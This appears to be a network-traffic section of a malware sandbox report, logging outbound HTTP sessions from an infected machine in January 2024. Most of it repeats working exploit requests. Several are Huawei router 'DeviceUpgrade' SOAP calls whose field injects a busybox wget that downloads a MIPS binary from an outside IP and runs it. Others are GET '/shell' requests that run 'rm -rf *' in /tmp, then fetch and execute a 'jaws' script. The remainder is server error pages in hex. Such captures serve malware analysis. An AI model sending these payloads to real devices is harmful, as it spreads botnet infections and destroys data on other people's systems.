                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:52.361363888 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:59.784359932 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:14.374310017 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:44.066099882 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          332192.168.2.2358084123.60.116.9780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.347163916 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.675971985 CET402INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: keep-alive
                                                          via: CHN-JSwuxi-GLOBAL2-CACHE96[2]
                                                          X-CCDN-ERRCODE-SRC: 01
                                                          X-CCDN-FORBID-CODE: 040001
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          333192.168.2.2352086148.72.211.16780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.420650959 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.761358976 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Server: Apache
                                                          Accept-Ranges: bytes
                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: 0
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f
                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { fo
                                                          Jan 2, 2024 06:24:45.761373997 CET1286INData Raw: 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20
                                                          Data Ascii: nt-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A
                                                          Jan 2, 2024 06:24:45.761385918 CET1286INData Raw: 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: t: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; ma
                                                          Jan 2, 2024 06:24:45.761423111 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b
                                                          Data Ascii: margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px;
                                                          Jan 2, 2024 06:24:45.761486053 CET1286INData Raw: 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37
                                                          Data Ascii: HHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0
                                                          Jan 2, 2024 06:24:45.761598110 CET1286INData Raw: 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56
                                                          Data Ascii: tphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEie
                                                          Jan 2, 2024 06:24:45.761610985 CET1012INData Raw: 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69 49 2f 64 63 2f 42 36 4e 2f 4d 39 57 73 69 41 44 4f 30 30 41
                                                          Data Ascii: muDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvd
